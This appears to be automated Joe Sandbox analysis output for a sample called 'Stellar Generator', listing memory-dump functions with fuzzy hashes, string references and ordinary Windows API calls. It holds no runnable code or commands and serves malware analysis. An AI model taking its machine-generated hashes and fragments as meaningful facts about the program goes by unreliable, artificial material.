Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID:
String ID: #$#
API String ID: 0-2529538431
Opcode ID: 328503039b410e80525a890d804314740a31425b4943717d3e201725ddc96e79
Instruction ID: 033fda52de26313b384bed7e2ee350dfd2e1e96ca801d8814570e889cf33c248
Opcode Fuzzy Hash: 328503039b410e80525a890d804314740a31425b4943717d3e201725ddc96e79
Instruction Fuzzy Hash: 9BD1C631A102158FDB04DF64C984BADBBB2FF88300F15857AD809AF3A5DB75D906CB51

Function 0528D628 Relevance: 2.8, Strings: 2, Instructions: 319
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#, xrefs: 0528D694
#, xrefs: 0528D72E

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID:
String ID: #$#
API String ID: 0-2529538431
Opcode ID: bb25f6c44c6dd3f8662d5fafc0063421905820f5fb3fe169f1ae9a4d2ee73844
Instruction ID: 80a5a1742022d8ed708175fc790896fe29e849c84fb7f72aac1fed87e1aecc4b
Opcode Fuzzy Hash: bb25f6c44c6dd3f8662d5fafc0063421905820f5fb3fe169f1ae9a4d2ee73844
Instruction Fuzzy Hash: 0BD1D435A102158FDB04DFA4C980BADBBB2FF88300F15857AD809AF3A6DB75D906CB51

Function 0528A810 Relevance: 2.7, Strings: 2, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ec=, xrefs: 0528AAF4
]R, xrefs: 0528A83B

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID:
String ID: ]R$ec=
API String ID: 0-3903173408
Opcode ID: 6361a620b4903348b35802cdf30ef800b745281a8d8816994ce1461bbc318cc6
Instruction ID: a61d73b0e2ea77580dc1941e765b1a17d96a82736ae73330c5559ce6c4499138
Opcode Fuzzy Hash: 6361a620b4903348b35802cdf30ef800b745281a8d8816994ce1461bbc318cc6
Instruction Fuzzy Hash: 3DA16C70E21209DFDB08DFA5D98499DFBF6FF88314F54852AD015AB2A4EB74990ACF10

Function 0528A820 Relevance: 2.7, Strings: 2, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ec=, xrefs: 0528AAF4
]R, xrefs: 0528A83B

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID:
String ID: ]R$ec=
API String ID: 0-3903173408
Opcode ID: ff664e28146e876f7029cd085c3b20606c08f1487b9977d94d857227d85450f6
Instruction ID: 6e0decb0e1210536489f629759852ad7d41c29309bc7f7323a35173d93b24e31
Opcode Fuzzy Hash: ff664e28146e876f7029cd085c3b20606c08f1487b9977d94d857227d85450f6
Instruction Fuzzy Hash: 7CA14B70E21209DFDB08DFA5D98199DFBF6FF88314F54852AD015AB2A4EB749906CF10

Function 072EF149 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94d6965908308c2c47a10f1182823f7e61a64518a5b2d30d7a59b0c220ff7721
Instruction ID: a10928ea1b7285737250aaf0666a818ad40e382640a1693b34c6d0f3cd71c5c3
Opcode Fuzzy Hash: 94d6965908308c2c47a10f1182823f7e61a64518a5b2d30d7a59b0c220ff7721
Instruction Fuzzy Hash: 87D19FB0A2020ACFDB54DFA9CA48BADBBF5BF44304F958518E409AF2A5DB74D945CB40

Function 0584BE60 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7613a2d7bf71dfb77a953f1ff84cf9bf492331163b2fe6be5293538f89723f4e
Instruction ID: a28d0bac009b8f85a3ac4ff9eec6dd9dd7df05a1091a5fec81be0dd5a08db4fb
Opcode Fuzzy Hash: 7613a2d7bf71dfb77a953f1ff84cf9bf492331163b2fe6be5293538f89723f4e
Instruction Fuzzy Hash: C8C16830A012588FCB24DFA8C8847A9BBB2BF88304F04C5AADC49AB255DB74DD85CF51

Function 079606E8 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8028b2377f0176dab06c3e0aa3594280c2da7b625ba554d76f198ff89f735422
Instruction ID: d56dfdf4af3c6bf971a3c453be6584ff25a5689f92a894d2d78d87af6274793d
Opcode Fuzzy Hash: 8028b2377f0176dab06c3e0aa3594280c2da7b625ba554d76f198ff89f735422
Instruction Fuzzy Hash: 08B1A2B4A1410ADFDB14CF6CC898EAEBBB5FB89304F048A66E80597391D774D941CF91

Function 072E28F0 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62211e43fb191a3cedc945fa949769d23f79e81d1980d8843dbfe6bba7615166
Instruction ID: 6070abc594d609182e3f827834a52beae70f864330ac4575ffc04aa188a39055
Opcode Fuzzy Hash: 62211e43fb191a3cedc945fa949769d23f79e81d1980d8843dbfe6bba7615166
Instruction Fuzzy Hash: F1A18070A20145CFDB14DFA8D548BADBBBAFF89300F558476E505EB3A1CB759941CB40

Function 079606D7 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e353a13504ad90719bca5424f6c046ebfe471379395897a883b91c6205f28b0
Instruction ID: 32f975dcfc7a0507098cfea85310ded25ddd6247e88cdbdd31ea8180646ec2d3
Opcode Fuzzy Hash: 7e353a13504ad90719bca5424f6c046ebfe471379395897a883b91c6205f28b0
Instruction Fuzzy Hash: E8A192B1A1410ADFDB54CF6CC898EADBBB5FB85308F048666E8099B391D774D941CF81

Function 072E3EE2 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26794921b9c836902e457741ed8094a9d5a972a77ae7e9398ef31b7c497a321d
Instruction ID: 873a66f5e0d7c6b1e01aabadb399ae6e8ca82aea52a657795ae0c24ef2eb1460
Opcode Fuzzy Hash: 26794921b9c836902e457741ed8094a9d5a972a77ae7e9398ef31b7c497a321d
Instruction Fuzzy Hash: D7A18FB1A20145CFDB14DFA8D548BADBBBAEF88300F198476E505EB3A5CB75D981CB40

Function 07946310 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a27fe781117f7bcb90c1d2faffeee75eab78e2633af5e20b406dd8c7cdf6c129
Instruction ID: 36597a467c8812280b81c1daa80063efdfebea16fb899547f631bf198da63104
Opcode Fuzzy Hash: a27fe781117f7bcb90c1d2faffeee75eab78e2633af5e20b406dd8c7cdf6c129
Instruction Fuzzy Hash: 8361CDB1E11119DBDF048EA5EA84AEDBF36FBC6304F118466D441B6288C7759E72CF82

Function 07946320 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d34aa6e769eb2c23eb003ea4f800885694096ff67cdae954393677cf7cc0ad
Instruction ID: d7e9e01d6151156d4e253f52002a7bf10c874fa3b4b33fef1ebeb1655dffcc02
Opcode Fuzzy Hash: 59d34aa6e769eb2c23eb003ea4f800885694096ff67cdae954393677cf7cc0ad
Instruction Fuzzy Hash: 8A61ADB1F11119DBDF048EA5E984AADBF36FBC6304F128466D441B6288C7759E72CF42

Function 07965610 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e117142797ecb6514c7aa09b115d73947f8a0d21f2557903c2636c9f8bfa6cb9
Instruction ID: 18235435d038a2be2ac88d0c70d3031e866e7271795f86542535ca8cb88ebbd7
Opcode Fuzzy Hash: e117142797ecb6514c7aa09b115d73947f8a0d21f2557903c2636c9f8bfa6cb9
Instruction Fuzzy Hash: 1D51B4F0F3C606D7F7244128950D33A6956A78270CF278F23D80B8A694DAE8CEB1D752

Function 07965600 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 551cf44742e96a05ac5c7a7783a7da838c2054ab19fe2946fe869796cf31c863
Instruction ID: 22f719e24e94c3cb4ae1679864cbeb59bb87a5290d1d515c343167754c8ace88
Opcode Fuzzy Hash: 551cf44742e96a05ac5c7a7783a7da838c2054ab19fe2946fe869796cf31c863
Instruction Fuzzy Hash: A841F9F0E3C642DAF7254538950D73A6A66A78360CF178F23D80B86691C6E4CEB1D752

Function 079636D0 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 476f340d7a15650fcaf226bb6c6a299d8277ecacf7bfc3e68e69afd5f178873f
Instruction ID: 20646f0f75294e9ac5127f7c363d7df8809377d1fe05a96f8f5ba197936e107b
Opcode Fuzzy Hash: 476f340d7a15650fcaf226bb6c6a299d8277ecacf7bfc3e68e69afd5f178873f
Instruction Fuzzy Hash: 5D41BFB5B0020ADFDB08EF78D958BADB7A6EB89245F104A7AD409E7680CB35DD118B50

Function 079636E0 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e11a1f9270590c017ceac4a12a97432a7c3f98bdc0648c2705e12b764562f6ad
Instruction ID: 2402df11f272d7bd5f23ee18b3301a9538c703416dc7e65cc3bf71524759da0e
Opcode Fuzzy Hash: e11a1f9270590c017ceac4a12a97432a7c3f98bdc0648c2705e12b764562f6ad
Instruction Fuzzy Hash: 5E41A0B5B0020ADFDB18EF74D958BA9B7A6EB85344F104A79E409D7680CB75DD108B50

Function 07943514 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bc5cb790f7a1cd6386a32f3baf22975d0035427d0b9bc1ab3ac9dd08220b8c
Instruction ID: ff72970767c40606a658ede113a94bbba802965d6bf53b550199fc0c0600c8fd
Opcode Fuzzy Hash: c1bc5cb790f7a1cd6386a32f3baf22975d0035427d0b9bc1ab3ac9dd08220b8c
Instruction Fuzzy Hash: 3B4124B0B24105CFDB14CF60D948B9E77B3EBC9304F0688A6D50AAB2A4CB748D64CB41

Function 0142ACE8 Relevance: 1.7, APIs: 1, Instructions: 206COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0142AF3E

Memory Dump Source

Source File: 00000001.00000002.2964140725.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_Stellar Generator.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1519bfa0652f9b16226a4e17cce0fd00f52884e122a0c21d0fe797b19646ec62
Instruction ID: 843db46b82cf3ac322f5a14337502add34ca47644cd14f989b9bcade183d2fab
Opcode Fuzzy Hash: 1519bfa0652f9b16226a4e17cce0fd00f52884e122a0c21d0fe797b19646ec62
Instruction Fuzzy Hash: 828148B0A00B158FD724DF29D14475ABBF1BF48304F50892ED586DBB60D735E98ACB90

Function 079436C0 Relevance: 1.7, Strings: 1, Instructions: 413COMMON

Download Yara Rule

Strings

`d, xrefs: 079438AD

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID: `d
API String ID: 0-2674330335
Opcode ID: 9dd1a79cd6e0d5ef8a2c99a48f7917e1ea051143315019cbf1b6ccd67cdd2954
Instruction ID: ac9d6d6b3fc6f5a1203e13cc503c8b559c8f2fc55b4a665dd1d0e40123468ec5
Opcode Fuzzy Hash: 9dd1a79cd6e0d5ef8a2c99a48f7917e1ea051143315019cbf1b6ccd67cdd2954
Instruction Fuzzy Hash: 5DD1C1F1F10206CFCB16AF78C548AAEBFB5EF85208F5544A9D046B72A5D731C865CB81

Function 05281891 Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05281A02

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c3c6c55e05a048ca303b370da5168c973cc5e826fd7469914c69778131322b10
Instruction ID: 223644206cdac08957612974aba043adfc38188186e0c41936f898b721d6cdb6
Opcode Fuzzy Hash: c3c6c55e05a048ca303b370da5168c973cc5e826fd7469914c69778131322b10
Instruction Fuzzy Hash: 245112B1C10349AFCF11CF99C984ADEBFB6BF48304F15816AE908AB260D3719955CF90

Function 052818F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05281A02

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e2345ec822e03e4fc0f98e01a43bdc84f3b6b6b5ac3f466ed7710aa4b737ab21
Instruction ID: 74a29d81e56e75810d6ceba84f41217b8f68c84bd55d8fe6c0119803370c4f22
Opcode Fuzzy Hash: e2345ec822e03e4fc0f98e01a43bdc84f3b6b6b5ac3f466ed7710aa4b737ab21
Instruction Fuzzy Hash: 6641EFB1C103499FDB14DFA9C884ADEFBF5BF48300F24812AE819AB250D7719885CF91

Function 014258EC Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 014259A9

Memory Dump Source

Source File: 00000001.00000002.2964140725.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_Stellar Generator.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a3a7a2607ffed4f79dbc5ab93e748abd7c75ad371610e254f38606503065fecb
Instruction ID: 9af05c8335d9680aa6bd9e4835a0c29763c7e181d0204ce0631198faecec7392
Opcode Fuzzy Hash: a3a7a2607ffed4f79dbc5ab93e748abd7c75ad371610e254f38606503065fecb
Instruction Fuzzy Hash: 7141E4B4D00729CBDB24DFA9C9847CEBBB1BF49314F60806AD408AB264DB755986CF90

Function 014244B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 014259A9

Memory Dump Source

Source File: 00000001.00000002.2964140725.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_Stellar Generator.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: efc52a9142951d476045f2970109ab65b41138b76cf848c7fd8b987b43cb5d9a
Instruction ID: c69dc820ebcaeeafb18d159bb52c2ce0eaf562fccd03be8c2ac4a7e120cd3740
Opcode Fuzzy Hash: efc52a9142951d476045f2970109ab65b41138b76cf848c7fd8b987b43cb5d9a
Instruction Fuzzy Hash: 3B41D4B0C0072DCBDB24DFA9C8447DEBBB5BF49314F60806AD408AB265DB755985CF90

Function 05284030 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 052840F1

Memory Dump Source

Source File: 00000001.00000002.2988456306.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5280000_Stellar Generator.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5c168718bd860ac126d6251774fac4d9f6bc64870bd6c24d430002b782174088
Instruction ID: 75ac521f20fa919ebab9fe1cee21379ceac7d51f7cebacfca21015b43a375c18
Opcode Fuzzy Hash: 5c168718bd860ac126d6251774fac4d9f6bc64870bd6c24d430002b782174088
Instruction Fuzzy Hash: 764149B4910309CFCB14DF99C448AAAFBF5FF88318F258459D519AB361D375A841CFA0

Function 07961EB8 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0796337D,?,?), ref: 0796342F

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: de2dcf84861f99fa4d7dd08c3fc84a4427eb953fd397b21da80a12e612482045
Instruction ID: 79893dfd251ed4400ade348fce6db0880f20baafb1cfc759934ae2a32538b19a
Opcode Fuzzy Hash: de2dcf84861f99fa4d7dd08c3fc84a4427eb953fd397b21da80a12e612482045
Instruction Fuzzy Hash: B73114B59003599FDB11CFAAD884AEEFFF4EF48314F14842AE815A7210D7749944CBA5

Function 05848308 Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 058483BC

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 938647f75b48d9f743386d895a7ed923bd8e164a87d9d9d7cfa2229e9ff214c9
Instruction ID: f7f9f07d54c341a2718773b6253d175269b5a28f59ea282ca189b6a9ab9fde86
Opcode Fuzzy Hash: 938647f75b48d9f743386d895a7ed923bd8e164a87d9d9d7cfa2229e9ff214c9
Instruction Fuzzy Hash: D9319FB19093899FDB15CFA9C844A8EFFF4FF09210F14819ED854A7241D334A809CF61

Function 07963390 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0796337D,?,?), ref: 0796342F

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 4b502cd967f2e297353f99e63b249a5cc0e24874a55b6bf843ad9937065e1500
Instruction ID: 57fdb823d54aed85b1623d74b25714e039003e7b552b80c6e0a0a15571cb2831
Opcode Fuzzy Hash: 4b502cd967f2e297353f99e63b249a5cc0e24874a55b6bf843ad9937065e1500
Instruction Fuzzy Hash: B13102B59002099FCB10CF9AD884AEEFBF4EB48324F54842AE919A7210D375A545CFA0

Function 07961EC4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0796337D,?,?), ref: 0796342F

Memory Dump Source

Source File: 00000001.00000002.3039801925.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7960000_Stellar Generator.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 7589237ed90d0318d7ad7e93cf2151a4890b3959b49af4d1810f5e8e657b08eb
Instruction ID: 4d6986602460ed757db5519919f3d1070e291f464de5b56413bfe12714c5b5a5
Opcode Fuzzy Hash: 7589237ed90d0318d7ad7e93cf2151a4890b3959b49af4d1810f5e8e657b08eb
Instruction Fuzzy Hash: D131E2B59003499FDB10CF9AD884AAEFBF4EB48314F54842AE919A7210D775A944CFA0

Function 072EF9D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?), ref: 072EF98D

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_Stellar Generator.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b8dc2bf99fe7b177895472d2787add2743c132a643927480f351da980d3219ed
Instruction ID: 2badbaf81ef1de68edeb7ff4ffce8f90a92091edef19ea0306e4e8b458bbc94b
Opcode Fuzzy Hash: b8dc2bf99fe7b177895472d2787add2743c132a643927480f351da980d3219ed
Instruction Fuzzy Hash: 5C11EEB79042499FDB118BA9D8047DEBBF8AF48220F04807AD448E7A91D739914ACBA1

Function 05848231 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 058482CA

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 96cf8704e9b402839421a6206d8d997fcdb39bb855b07d65197dde7269116edc
Instruction ID: f11000f82b17f8e8766e7ea64bb32e3441bccda92f1a09846a59377cb199aa0f
Opcode Fuzzy Hash: 96cf8704e9b402839421a6206d8d997fcdb39bb855b07d65197dde7269116edc
Instruction Fuzzy Hash: 7D2159B68047598FDB10CFAAD845B9EFBF4FB48320F04C51AD854A3650D338A545CF65

Function 0142D1BC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0142D596,?,?,?,?,?), ref: 0142D657

Memory Dump Source

Source File: 00000001.00000002.2964140725.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_Stellar Generator.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0c85fb102f63724d7941ae6b6f4bf0ec66e0e0427d1eac330ef2f27adc2f2c76
Instruction ID: df0a4e7c0be31435b04a2f965bbf83856450c1e89cc674e1c5002c10da706e62
Opcode Fuzzy Hash: 0c85fb102f63724d7941ae6b6f4bf0ec66e0e0427d1eac330ef2f27adc2f2c76
Instruction Fuzzy Hash: 2721E3B5D00258AFDB10CFAAD984ADEFBF4EB48310F14841AE918B3350D379A944CFA5

Function 0142D5C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0142D596,?,?,?,?,?), ref: 0142D657

Memory Dump Source

Source File: 00000001.00000002.2964140725.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1420000_Stellar Generator.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7f21e9c42c9e0d4d8ca0c6c426f62285d469cf8905d340aee79aa7091f20525f
Instruction ID: 26789d6e61a2689239f145bce328571b7358d66a2a4a10e7ca1f2424f9fd7eb7
Opcode Fuzzy Hash: 7f21e9c42c9e0d4d8ca0c6c426f62285d469cf8905d340aee79aa7091f20525f
Instruction Fuzzy Hash: B021E2B5D002189FDB10CFAAD984ADEFBF5EB48314F14841AE918B3310D378AA44CFA0

Function 05848340 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32(?,00000000), ref: 058483BC

Memory Dump Source

Source File: 00000001.00000002.2993420870.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5840000_Stellar Generator.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 6744f97aecf5021321da927ac8b82c08cb3e4182682e70d52bc552e34f75770a
Instruction ID: 66d1045f219c04da6c3c60ef6c89e3c7dbd8e3320a212d6c5bcb75e192a37f80
Opcode Fuzzy Hash: 6744f97aecf5021321da927ac8b82c08cb3e4182682e70d52bc552e34f75770a
Instruction Fuzzy Hash: 0E2113B1D017099FDB10CF9AD884ADEFBF4FB48314F14802AE919A7640D374A948CFA5

Function 07940710 Relevance: 1.6, Strings: 1, Instructions: 311COMMON

Download Yara Rule

Strings

`d, xrefs: 07940946

Memory Dump Source

Source File: 00000001.00000002.3039406660.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7940000_Stellar Generator.jbxd

Similarity

API ID:
String ID: `d
API String ID: 0-2674330335
Opcode ID: 00e1cf99046b3cabdfe295aa2fed0682125ed3377925ec0d695e72ec12d39621
Instruction ID: e715e0c1486a3ba42b7e4a4f83e098ad88797b5fcd880687b59d8f05f2f0941e
Opcode Fuzzy Hash: 00e1cf99046b3cabdfe295aa2fed0682125ed3377925ec0d695e72ec12d39621
Instruction Fuzzy Hash: 4FE1D475E1026ACFDB24CF68C884B99BBB1FF48304F1485EAD509AB351DB71AA85CF50

Function 072E5200 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 072E5285

Memory Dump Source

Source File: 00000001.00000002.3018885500.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

